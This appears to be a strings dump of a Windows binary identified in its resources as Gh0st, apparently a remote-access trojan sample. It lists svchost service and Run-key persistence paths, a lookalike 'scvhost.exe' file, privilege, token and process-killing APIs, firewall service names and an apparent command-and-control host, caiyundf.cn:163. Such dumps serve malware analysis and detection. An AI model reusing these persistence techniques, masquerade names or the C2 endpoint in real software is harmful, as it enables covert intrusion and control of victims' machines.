!This program cannot be run in DOS mode.
`.rdata
@.data
MFC42.DLL
_access
__CxxFrameHandler
_except_handler3
strstr
MSVCRT.dll
CloseHandle
WriteFile
CreateFileA
FreeLibrary
GetTickCount
GetLastError
GetFileAttributesA
lstrcpyA
GetLocalTime
GetProcAddress
LoadLibraryA
GetCommandLineA
MoveFileExA
DeleteFileA
ExpandEnvironmentStringsA
WaitForSingleObject
CreateThread
SetUnhandledExceptionFilter
KERNEL32.dll
wsprintfA
USER32.dll
_mkdir
Ranv(wugaudl&jfkfhs(db%ssg'lf'CGU'hnbl)
dpUaeo
i)wlfsi
G)lgsd
I)wmkhk
\|dR^U
RPTUa?
DRVQZo|9
PFVUaN.
F_PP[nt7
JPR_To"4
DRVQZo
WT[UTV
VQSWP_
XVWUQV_W
[PPoA5
XTS_ow
WUQVYW
PT[UTmb;
VT^Qou
POqIN}4M|
YY_^][
FxSSVhPZ
FxSSVh
SVWhD
8 t0VW
VirtualFree
VirtualAlloc
InterlockedExchange
CloseHandle
WriteFile
SetFilePointer
CreateFileA
GetFileSize
GetLastError
lstrlenA
lstrcpyA
FreeLibrary
GetProcAddress
LoadLibraryA
GetTickCount
WinExec
ReadFile
GetFileAttributesA
LocalFree
LocalSize
LocalAlloc
lstrcatA
GetCurrentProcessId
Process32Next
TerminateProcess
OpenProcess
Process32First
CreateToolhelp32Snapshot
CopyFileA
GetModuleFileNameA
GlobalMemoryStatusEx
WaitForSingleObject
GetCurrentDirectoryA
FreeConsole
HeapAlloc
GetProcessHeap
VirtualProtect
HeapFree
InitializeCriticalSection
DeleteCriticalSection
CreateThread
LeaveCriticalSection
EnterCriticalSection
SetEvent
CreateEventA
WritePrivateProfileStringA
GetSystemDirectoryA
GetPrivateProfileStringA
lstrcmpiA
KERNEL32.dll
GetWindowThreadProcessId
ChangeDisplaySettingsA
GetSystemMetrics
wsprintfA
GetLastInputInfo
USER32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyExA
CloseServiceHandle
ControlService
QueryServiceStatus
OpenServiceA
OpenSCManagerA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
OLEAUT32.dll
??3@YAXPAX@Z
__CxxFrameHandler
??2@YAPAXI@Z
memcmp
_CxxThrowException
memcpy
memset
strlen
_except_handler3
_local_unwind2
strstr
strcpy
strncpy
strrchr
strcmp
malloc
printf
strcspn
wcstombs
realloc
strcat
_errno
_beginthreadex
strchr
MSVCRT.dll
??1type_info@@UAE@XZ
__dllonexit
_onexit
_initterm
_adjust_fdiv
WS2_32.dll
GetIfTable
GetAdaptersInfo
iphlpapi.dll
_strupr
_strcmpi
_stricmp
_strnicmp
MainDll.dll
DllUpdate
Install
MainThread
ServiceMain
Uninstall
Description
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
ServiceDll
SYSTEM\CurrentControlSet\Services\%s\Parameters
%%SystemRoot%%\System32\svchost.exe -k "%s"
WinSta0\Default
CreateEnvironmentBlock
userenv.dll
%s\%d.bak
PluginMe
127.0.0.1
SeShutdownPrivilege
Remark
Rundll32 "%s",Uninstall
Rundll32 "%s",DllUpdate %s
%s\shell\open\command
Applications\iexplore.exe\shell\open\command
explorer.exe
SeDebugPrivilege
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\Program Files\Common Files\scvhost.exe
Dwmapi.dll
DwmIsCompositionEnabled
DwmEnableComposition
dwmapi.dll
Setting
RtlGetNtVersionNumbers
ntdll.dll
%d*%sMHz
HARDWARE\DESCRIPTION\System\CentralProcessor\0
GetCurrentProcess
IsWow64Process
kernel32.dll
0.0.0.0
%u Mbps
%u Gbps
%s:%d:%s
GUpdate%s
caiyundf.cn:163
%s "%s",MainThread
\Rundll32.exe
%s\%s.exe
IsBadReadPtr
CoCreateInstance
CoUninitialize
CoInitialize
Ole32.dll
wininet.dll
RegDeleteValueA
RegDeleteKeyA
RegSetValueExA
RegCreateKeyExA
RegCloseKey
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryValueExA
CreateProcessAsUserA
SetTokenInformation
DuplicateTokenEx
OpenProcessToken
DeleteService
ChangeServiceConfig2A
CreateServiceA
ControlService
QueryServiceStatus
CloseServiceHandle
StartServiceA
OpenServiceA
OpenSCManagerA
RegisterServiceCtrlHandlerA
SetServiceStatus
ADVAPI32.dll
gethostname
getsockname
select
WSAIoctl
setsockopt
closesocket
connect
gethostbyname
socket
WSACleanup
WSAStartup
ws2_32.dll
memmove
strstr
memset
memcpy
strlen
strcmp
MSVCRT.dll
EnumWindows
SendMessageA
IsWindowVisible
MessageBoxA
ExitWindowsEx
wsprintfA
User32.dll
Process32Next
Process32First
CreateToolhelp32Snapshot
WTSGetActiveConsoleSessionId
MoveFileExA
MoveFileA
GetSystemDirectoryA
GetSystemInfo
ExpandEnvironmentStringsA
GetExitCodeProcess
GetVersionExA
TerminateThread
SetEvent
CancelIo
ResetEvent
CreateEventA
GetFileAttributesA
WaitForSingleObject
GetTickCount
lstrcatA
CloseHandle
GetLastError
ReleaseMutex
CreateMutexA
GetModuleFileNameA
CreateProcessA
StopListen
SharedAccess
MpsSvc
CONNECT
\ini.ini
GetCurrentThreadId
CloseDesktop
SetThreadDesktop
GetUserObjectInformationA
GetThreadDesktop
user32.dll
OpenDesktopA
OpenInputDesktop
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
MSIE 6.0
InternetOpenA
KERNEL32.dll
LookupPrivilegeValueA
AdjustTokenPrivileges
.?AVtype_info@@
HrCg@b
020G0v0
0:1C1_1
222E2|2
3<3N3d3z3
5%5:5n5x5
636[6E7
<"<,<2<K<`<j<{<
=,=6=D=R=d=m=t=
0 1-1Y1`1
212>2E2L2X2w2}2
3F3R3[3m3
4$4*4:4@4I4
7*7Q7j7n7r7v7z7~7
8"8'8=8X8f8n8
: :0:6:D:J:P:X:^:d:j:p:y:
;#;9;c;
<8<?<V<]<o<u<
<M=_=f=u=
>&>C>l>
>(?/?H?
0'0C0I0O0o0
1)1F1o1
4.444A4F4R4e4x4
5/545K5W5`5w5
6B6T6Z6`6k6s6
838F8n8
9"9-9A9R9`9n9|9
;?;N;T;r;};
;J<W<\<
<@=R=d=
0*070N0d0
111G1V1i1
1!23292V2
3)3.333D3T3m3
4 4:4a4n4
5/6:6F6M6^6i6p6
7.7A7H7P7U7e7
8 8*818S8z8
;';U;[;d;
2)262C2P2]2j2w2
3"3/3:3J3Z3j3z3
4*4:4J4Z4j4z4
5"525B5R5b5r5
6"626H6R6b6o6y6
8$8*8@8U8r8
9&9K9s9
;+;@;G;e;
<!<=<C<j<
= =3=m=:>D>
2A3R3g3s3
5/585?5N5^5t5
696A6R6e6p6y6
9-:M:_:k:{:
;(;H;N;[;f;|;
;`<o<z<
<1=E=\=b=i=x=
=+>>>I>N>h>
?(?.?_?}?
)0=0L0k0
1B1U1x1
3F3O3V3\3b3h3r3x3
4$4Q4^4e4j4
5 5,525T5f5
516i6u6
2024282H2L2P2T2X2\2`2p2
3,303@3\3d3l3t3
404D4P4l4x4
5(5D5L5T5`5|5
0 0 1 >
9U@d7xOWKh4s*MCn<
PD-=6FP=+sBp!
HZ9v+sBp165vO> %4;G^7w5&BS+)Mt/
)xBpPP
%4d-%.2d-%.2d %.2d:%.2d
ShellExecuteA
shell32.dll
GetVersionExA
CreateMutexA
ReleaseMutex
kernel32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
ADVAPI32.dll
rundll32.exe
"%s",MainThread
Install
MainThread
%s%d.txt
%Temp%\
%s:%d:%s
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
</dependentAssembly>
</dependency>
</assembly>
HrCg@b
FriendlyName
VS_VERSION_INFO
StringFileInfo
080404b0
Comments
CompanyName
FileDescription
Install
FileVersion
1, 0, 0, 1
InternalName
Install
LegalCopyright
(C) 2020
LegalTrademarks
OriginalFilename
Install.dat
PrivateBuild
ProductName
Install
ProductVersion
1, 0, 0, 1
SpecialBuild
VarFileInfo
Translation
Property Page
MS Sans Serif
TODO: layout property page
Check1
Static
SysListView32
SysListView32
SysListView32
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
Gh0st Microsoft
FileVersion
1, 0, 0, 1
InternalName
LegalCopyright
(C) 2014
LegalTrademarks
OriginalFilename
Gh0st.EXE
ProductName
Gh0st
ProductVersion
1, 0, 0, 1
VarFileInfo
Translation